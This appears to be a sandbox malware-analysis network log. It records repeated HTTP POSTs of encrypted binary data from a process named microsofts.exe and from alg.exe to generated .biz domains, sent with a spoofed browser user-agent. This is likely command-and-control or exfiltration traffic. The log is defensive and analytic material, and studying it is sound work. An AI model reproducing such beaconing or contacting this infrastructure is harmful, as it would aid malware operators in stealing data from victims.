                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
127 | 192.168.2.5 | 59801 | 47.129.31.212 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:28.980695009 CET | 350 | OUT | POST /fmrmh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rrqafepng.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:28.980775118 CET | 828 | OUT | Data Raw: 64 fb b3 fe f2 08 a0 3c 30 03 00 00 01 e0 a1 5e 06 33 da fe 27 f2 82 de fc bd 1f 02 a6 24 c4 85 c0 e8 e6 52 3e 02 4c be 93 b2 41 be 51 82 41 e1 ed 3a cf 7b ea 19 65 2d b9 39 78 4f bf 25 62 44 41 0e 72 c1 97 3c 06 4f e4 70 26 fc 46 d0 fd 37 f0 8c
Data Ascii: d<0^3'$R>LAQA:{e-9xO%bDAr<Op&F7Y6==\rHitR!fr@JV:~F*EL*|O:r8PEjzx;5~Vhx0&?U?";g<QdG6
Nov 5, 2024 17:04:30.414443016 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9d3f4b6521f4e11f9b77343d606122ee|173.254.250.76|1730822670|1730822670|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
128 | 192.168.2.5 | 59802 | 3.94.10.34 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:29.002130985 CET | 348 | OUT | POST /cngo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ctdtgwag.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:04:29.002221107 CET | 778 | OUT | Data Raw: 22 10 79 d4 6d 56 6e dd fe 02 00 00 45 47 79 97 01 d3 b0 63 72 5f 93 13 e9 78 2f 02 e9 e7 76 d0 6f 12 37 eb 14 21 8f c6 29 2a 26 ed 57 d0 20 8c ca 66 03 4f c7 bb 06 ea 82 a0 a9 37 43 f9 50 0b 9f 7b 90 b4 21 c6 ff 49 11 d7 bb 4c 73 de 4a 62 17 45
Data Ascii: "ymVnEGycr_x/vo7!)*&W fO7CP{!ILsJbE!@|h/9IvDzx2&4a6t6TU"m;m}2[~5O/DO-@W|QYaq tYny]M|CW3nnwE<I
Nov 5, 2024 17:04:29.656167030 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0bdc64e7efe3508725c96c2343ae3a21|173.254.250.76|1730822669|1730822669|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
129 | 192.168.2.5 | 59803 | 3.94.10.34 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:30.438586950 CET | 354 | OUT | POST /wikoehfueo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ctdtgwag.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:30.438606977 CET | 828 | OUT | Data Raw: 59 97 3e d3 67 e7 22 ec 30 03 00 00 1b 71 8c 41 9b bd 32 a0 08 cb af 6a 2f 47 ce ca 3a 62 03 85 0d 18 02 2b 1d f1 49 f2 cd 1f 0e 50 aa 2b 8f 51 15 48 2e 42 f5 6d 01 79 04 91 cc 9c ac 28 35 d4 00 ce 1c 11 8b fe 1d bd c7 25 4c 68 8f c9 41 dd 41 d8
Data Ascii: Y>g"0qA2j/G:b+IP+QH.Bmy(5%LhAA/'^<#S2x'RJj*A?@l,<Swot/4v0~cV!+xH*/D?rYsJkr-P}b-YS#['+ucCnW*TF%
Nov 5, 2024 17:04:31.123630047 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8d29d65243bab7f43b50fd64afd802e1|173.254.250.76|1730822671|1730822671|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
130 | 192.168.2.5 | 59804 | 35.164.78.200 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:30.713051081 CET | 347 | OUT | POST /iih HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: tnevuluw.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:04:30.713088989 CET | 778 | OUT | Data Raw: 5b 55 f5 17 9e 71 2f 05 fe 02 00 00 da 8b 6f 02 7b 23 a0 02 97 cf 81 52 d9 d6 b4 c8 24 ed ae ad 8c 05 b5 89 0c 68 bf bf 33 cc 45 5f ac 24 b2 58 37 09 f7 53 25 f5 dd e5 27 3d c1 82 89 c4 38 e8 f2 97 35 d3 a8 b8 ce b7 17 91 66 27 ba 3e 32 40 ad 2f
    Data Ascii: [Uq/o{#R$h3E_$X7S%'=85f'>2@/09p%YJ%BsakY>\4=Qie.xX;(lcPj``".dy7P!tN:y!B[uab7={pz=CxRSHLh,+r?
Nov 5, 2024 17:04:32.545171976 CET | 416 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:31 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=0b623f90ae16dc7a5aa34f8c68e95318|173.254.250.76|1730822671|1730822671|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
Nov 5, 2024 17:04:32.546071053 CET | 416 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:31 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=0b623f90ae16dc7a5aa34f8c68e95318|173.254.250.76|1730822671|1730822671|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
Nov 5, 2024 17:04:32.546544075 CET | 416 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:31 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=0b623f90ae16dc7a5aa34f8c68e95318|173.254.250.76|1730822671|1730822671|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
131 | 192.168.2.5 | 59805 | 35.164.78.200 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:31.143604994 CET | 355 | OUT | POST /kykfeohkixf HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: tnevuluw.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:04:31.143634081 CET | 828 | OUT | Data Raw: 9a 0b 39 db 66 a0 ce 60 30 03 00 00 41 83 c6 86 65 de 35 91 e8 83 d4 2c 57 f7 bd b6 db ee c8 d3 6e 89 38 33 9c 5d 72 16 9d b6 7c 62 ff c6 7e 0a 76 ed 08 5c 45 37 4e 07 ae de a5 c3 7b 98 b0 68 58 e0 0e 3a 86 bf c0 fc 32 1b 88 82 4c 0b 33 6a ea 3b
    Data Ascii: 9f`0Ae5,Wn83]r|b~v\E7N{hX:2L3j;E&o+gzv7h]/6CdMDyu3NRTxgO[QI6fkvsU8g`I&;h n[x7A[+OGmeI[hA{o_ACdwp/A5
Nov 5, 2024 17:04:32.546144009 CET | 416 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:31 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=133a725022ac94bf1fd9f5a7adac857e|173.254.250.76|1730822671|1730822671|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
Nov 5, 2024 17:04:32.546485901 CET | 416 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:31 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=133a725022ac94bf1fd9f5a7adac857e|173.254.250.76|1730822671|1730822671|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              132192.168.2.55980618.141.10.107801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.609092951 CET347OUTPOST /ybxut HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.609321117 CET828OUTData Raw: ea 1a af b0 dd 77 38 7d 30 03 00 00 1e 2d 45 54 ff da a8 8e d7 90 a8 7b 35 bd 89 5b e4 6a 19 b2 c1 21 a2 e5 be a6 81 20 2f b8 18 bf 19 a3 3f d0 dd 90 f2 79 7f 43 5e 9d 0f 0b d7 bf 4a 68 ea 51 1e e3 a9 63 31 0c 8d 8d 68 32 1c 25 1f ea 5e 99 70 c2
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: w8}0-ET{5[j! /?yC^JhQc1h2%^pqBCILz3xunRZXEcO$<U'F]5C1mVID*Jyl16l_4uL{(F@nfP5,*\8.S|U6r1|N;J9/%
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.041248083 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=1375d045b03f71f6d77e11d2b05fac9b|173.254.250.76|1730822673|1730822673|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              133192.168.2.55980818.141.10.107801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.998570919 CET358OUTPOST /yadhctxanlnpjhwu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.998759985 CET778OUTData Raw: bf b8 e1 d9 87 f3 bc e6 fe 02 00 00 40 43 00 a6 82 0a c7 47 e1 59 21 02 e5 36 c6 f4 f8 6f a3 c5 12 13 b8 84 1e f3 80 4d b7 6c d6 26 d8 30 0c 01 f1 62 61 89 1d be 37 8a 9a f9 a2 f3 fd 92 e1 03 ee 6f a6 ef 0a 48 a5 b6 4c 53 42 a6 7c c5 1c c2 30 1a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: @CGY!6oMl&0ba7oHLSB|0[D|lGny]p\3Z)s9g7^=W9YS<YU9=PVgqK^]jFo Wa zxX3WMY@C4^\k(,nYF_
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.432279110 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=06e06de0d67d91d73d6dbfa1f0730e18|173.254.250.76|1730822674|1730822674|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              134192.168.2.559809208.100.26.245801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.133176088 CET353OUTPOST /aloksmnh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.133244038 CET828OUTData Raw: 7e dd 60 66 53 81 4a 61 30 03 00 00 78 26 af 4b 82 37 ff 49 01 8d 22 0b 1d b5 68 f3 a6 6e fd b2 e3 d6 53 d5 eb ec 6a 08 f9 67 30 0d 56 59 28 04 1b ca e6 ed 67 7d 96 a2 94 59 27 85 08 42 ae 78 11 42 46 98 b1 e4 aa b1 cf a9 21 a3 eb 4a a2 b9 27 fb
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ~`fSJa0x&K7I"hnSjg0VY(g}Y'BxBF!J'i3t.=6z4t3oGw[5tz_G$`g),ye/sYsYA'LFumCN7k1T!A]BpH-}("iAJ6gC
Nov 5, 2024 17:04:34.775217056 CET | 744 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 05 Nov 2024 16:04:34 GMT
    Content-Type: text/html
    Content-Length: 580
    Connection: keep-alive
    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 135
Source IP: 192.168.2.5
Source Port: 59810
Destination IP: 208.100.26.245
Destination Port: 80
PID: 1816
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:34.836910963 CET | 346 | OUT | POST /i HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: gjogvvpsf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:04:34.836940050 CET | 828 | OUT | Data Raw: (828-byte binary request body; hex dump omitted)
Nov 5, 2024 17:04:35.477526903 CET | 744 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 05 Nov 2024 16:04:35 GMT
    Content-Type: text/html
    Content-Length: 580
    Connection: keep-alive
    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 136
Source IP: 192.168.2.5
Source Port: 59811
Destination IP: 208.100.26.245
Destination Port: 80
PID: 1492
Process: C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:35.054140091 CET | 357 | OUT | POST /xflcwjjwcbmi HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: gjogvvpsf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:04:35.054156065 CET | 778 | OUT | Data Raw: (778-byte binary request body; hex dump omitted)
Nov 5, 2024 17:04:35.695395947 CET | 744 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 05 Nov 2024 16:04:35 GMT
    Content-Type: text/html
    Content-Length: 580
    Connection: keep-alive
    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 5, 2024 17:04:35.733706951 CET | 357 | OUT | POST /sbplnevnaxjj HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: gjogvvpsf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:04:35.733804941 CET | 778 | OUT | Data Raw: (778-byte binary request body; hex dump omitted)
Nov 5, 2024 17:04:35.878901005 CET | 744 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 05 Nov 2024 16:04:35 GMT
    Content-Type: text/html
    Content-Length: 580
    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
137 | 192.168.2.5 | 59812 | 44.221.84.105 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:35.525202990 CET | 353 | OUT | POST /xnjeybrqhb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: reczwga.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:35.525202990 CET | 828 | OUT | Data Raw: 38 62 f0 92 75 62 08 42 30 03 00 00 61 7c d3 65 9a d8 26 c7 32 e8 f7 03 a0 a0 8a 88 63 46 1c e8 a4 44 13 e6 e9 c0 8d 4f de dd 7c 04 8d 32 e6 d0 30 93 8c 58 2f d7 32 22 27 74 6c d8 01 f1 df 17 62 30 8f f0 af 4d 3d 5c ec f9 34 da 3d 68 fc e7 76 e5
Data Ascii: 8bubB0a|e&2cFDO|20X/2"'tlb0M=\4=hvu{BGa3S[8.CEDIQaf1G12_4CDQcFQs:+<>jg`_:SQde~DPp8-p9#Zy[d:9N+gB`b(
Nov 5, 2024 17:04:36.188997030 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4148d1a123e0c838f75807fac97df4b7|173.254.250.76|1730822676|1730822676|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
138 | 192.168.2.5 | 59813 | 34.211.97.45 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:36.219011068 CET | 355 | OUT | POST /qtclvagsdhvow HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bghjpy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:36.219075918 CET | 828 | OUT | Data Raw: 6f 5e 35 b7 51 96 41 c0 30 03 00 00 d9 79 11 53 ca 97 3d 0f 9e 10 f2 87 df 56 46 dd d7 a0 08 d5 2a fc aa 85 2b 9d 0b cd f8 60 97 58 b9 5c d8 ec 01 ad 2b 79 e5 e5 1d 55 1f 94 c3 af cc 87 58 50 4c ba 0d 74 dd aa a6 25 ff 74 c1 35 57 c1 3b 42 a0 ab
Data Ascii: o^5QA0yS=VF*+`X\+yUXPLt%t5W;BA/X[q]GJKzjYX9>~*|.I`^fOE\.oi0Nmi;&&_y<w[P}3d[M
Nov 5, 2024 17:04:37.040661097 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=88a13abac031a42a53b9e8f2fa41f1b2|173.254.250.76|1730822676|1730822676|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
139 | 192.168.2.5 | 59814 | 44.221.84.105 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
